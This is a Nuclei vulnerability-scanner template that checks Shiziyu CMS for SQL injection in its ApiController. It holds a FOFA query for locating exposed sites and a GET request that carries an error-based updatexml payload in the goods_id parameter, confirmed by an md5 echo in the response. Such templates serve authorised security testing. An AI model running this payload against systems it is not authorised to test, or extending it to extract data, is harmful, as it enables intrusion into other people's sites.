id: shiziyu-cms-apicontroller-sqli

info:
  name: Shiziyu CMS Api Controller - SQL Injection
  author: SleepingBag945
  severity: high
  description: |
    Shiziyu CMS ApiController.class.php parameter filtering is not rigorous, resulting in SQL injection vulnerability.
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/seller.php?s=/Public/login"
  tags: sqli
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5({{num}}),0x7e),1)"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'c8c605999f3d8352d7bb792cf3fdb25'

      - type: status
        status:
          - 404

# digest: 490a004630440220568d1a480733bdad8101bed626f23d0df24a131a94561274a2c5203c8c42b03d022070dcaad4084a104ca594d6e30097f071170aa15189aeb81cd7bec199d51cf017:922c64590222798bb761d5b6d8e72950